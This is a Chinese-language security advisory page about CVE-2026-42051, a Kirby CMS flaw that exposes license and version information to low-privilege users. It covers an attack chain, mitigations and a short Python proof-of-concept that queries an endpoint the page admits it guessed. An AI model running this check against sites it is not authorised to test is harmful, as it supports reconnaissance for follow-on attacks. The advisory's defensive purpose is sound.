CVE-2026-42051 CVSS 4.3 中危

CVE-2026-42051 Kirby CMS信息泄露漏洞

披露日期: 2026-05-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42051

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kirby CMS

漏洞概述

Kirby CMS是一款流行的开源内容管理系统。在4.9.0和5.4.0版本之前，该系统存在信息泄露漏洞。由于API端点缺乏足够的访问控制，任何已认证用户均可通过访问特定系统接口获取敏感数据，包括许可证详情和已安装版本信息。该漏洞虽然评级为中危，但为攻击者提供了版本侦察的便利，便于后续针对性攻击。

技术细节

该漏洞源于Kirby CMS在系统API端点的访问控制逻辑设计不当。在受影响的旧版本中，用于返回系统状态或配置信息的API接口未对请求用户的权限级别进行严格的校验。根据CVSS向量分析，攻击复杂度低且无需用户交互。攻击者仅需拥有系统的一个普通低权限账户，即可利用该漏洞。具体的利用过程为：攻击者登录后截获有效的身份凭证（如Session Cookie或API Token），随后构造特定的HTTP请求发送至存在漏洞的API端点。服务器在验证凭证有效性后，误判请求合法，从而在响应体中直接返回了包含软件许可证详细数据及当前系统精确版本号的JSON对象。这种信息泄露虽然不直接导致系统被入侵，但为攻击者提供了关键的侦察情报，使其能够利用已知的版本漏洞进行后续的精准打击。

攻击链分析

STEP 1

侦察与获取凭证

攻击者对目标Kirby CMS站点进行侦察，注册或通过其他方式获取一个低权限用户的账户凭证。

STEP 2

身份验证

攻击者使用获取的凭证登录系统，获取有效的Session ID或API Token。

STEP 3

发送API请求

攻击者构造HTTP请求，携带认证信息访问泄露信息的系统API端点。

STEP 4

获取敏感信息

服务器响应请求，返回包含许可证数据和系统版本号的JSON数据，攻击者解析并保存该信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_cve_2026_42051(target_url, session_cookie):
    """
    PoC for CVE-2026-42051
    Checks if the Kirby CMS API leaks license and version info.
    """
    headers = {
        "Cookie": session_cookie,
        "User-Agent": "Mozilla/5.0 (PoC Scanner)"
    }
    
    # Assuming the endpoint is /api/system or similar, based on description
    endpoint = f"{target_url.rstrip('/')}/api/system"
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            # Check if sensitive keys exist in response
            if 'license' in data or 'version' in data:
                print(f"[+] Vulnerability Confirmed!")
                print(f"    Version: {data.get('version')}")
                print(f"    License Data: {data.get('license')}")
                return True
        print("[-] Vulnerability not detected or endpoint changed.")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

# Usage
# check_cve_2026_42051("http://target-kirby-site.com", "kirby_session=xyz123")

影响范围

Kirby < 4.9.0

Kirby < 5.4.0

防御指南

临时缓解措施

如果暂时无法升级，建议在应用层或网络层实施严格的访问控制策略，确保只有管理员角色的用户才能访问系统状态的API端点，或者直接禁用对外暴露的系统信息查询接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表